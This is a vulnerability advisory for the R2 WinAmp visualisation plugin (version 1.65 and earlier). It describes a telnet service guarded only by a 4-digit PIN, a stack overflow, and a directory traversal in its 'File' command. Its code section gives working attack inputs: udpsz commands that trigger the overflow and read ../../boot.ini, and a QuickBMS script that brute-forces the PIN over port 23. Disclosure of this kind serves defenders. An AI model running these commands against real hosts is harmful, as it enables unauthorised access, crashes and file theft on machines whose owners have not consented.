R2 versions 1.65 and below suffer from stack overflow, PIN brute forcing, and directory traversal vulnerabilities.
ba8d5c2101fecdc6134ad9ee1e54309816085a9c6d2e7183056b526de4495867
#######################################################################
Luigi Auriemma
Application: R2
http://www.rabidhamster.org/R2/
Versions: <= 1.65
Platforms: Windows
Bugs: A] stack overflow
B] directory traversal
C] PIN brute forcing
Exploitation: remote
Date: 09 Feb 2012
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's website:
"R2/Extreme is a plugin for the WinAmp music player. It produces
animated 3D graphics in real-time that twist and turn with the music.
Now used in nightclubs, parties, and even (apparently) a canadian
stripclub, R2 has become known for its fast, fluid visuals."
#######################################################################
=======
2) Bugs
=======
The registered version of R2 has a telnet port active by default and
uses a PIN number with a very limited range, from 1 to 9999.
The result is that it's enough to make a simple scanning of 9999 tries
to find the correct PIN and being able to exploit the following
vulnerabilites.
There are no IP bannings or other limitations, just check the "UNLOCKED"
reply to know what is the right PIN.
-----------------
A] stack overflow
-----------------
Stack overflow through the "File" command.
----------------------
B] directory traversal
----------------------
Directory traversal exploitable through the "File" command that allows
to view the files on the disk in which is installed the software.
--------------------
C] PIN brute forcing
--------------------
As explained in the introduction it's possible to brute force the PIN
number very easily being only 9999 those available.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
1234 is the default PIN number, change it accordingly with the one
found through the brute forcing scanner.
A]
udpsz -T -b a -c "1234\r\nFile([" 0 -c "])\r\n" -1 -D -3 SERVER 23 4000
B]
udpsz -T -b a -c "1234\r\nFile([../../../../../../boot.ini])" -D -3 SERVER 23 -1
C]
http://aluigi.org/papers/quickbms.zip
### beginning of the script r2_1c.bms ###
for i = 1 <= 9999
print "scan PIN %i%"
put i line
do
get TEXT line
if TEXT == "UNLOCKED"
print "PIN found: %i%"
cleanexit
endif
while TEXT != "NOT UNLOCKED"
next i
### end of the script ###
quickbms -n r2_1c.bms tcp://SERVER:23
#######################################################################
======
4) Fix
======
No fix.
#######################################################################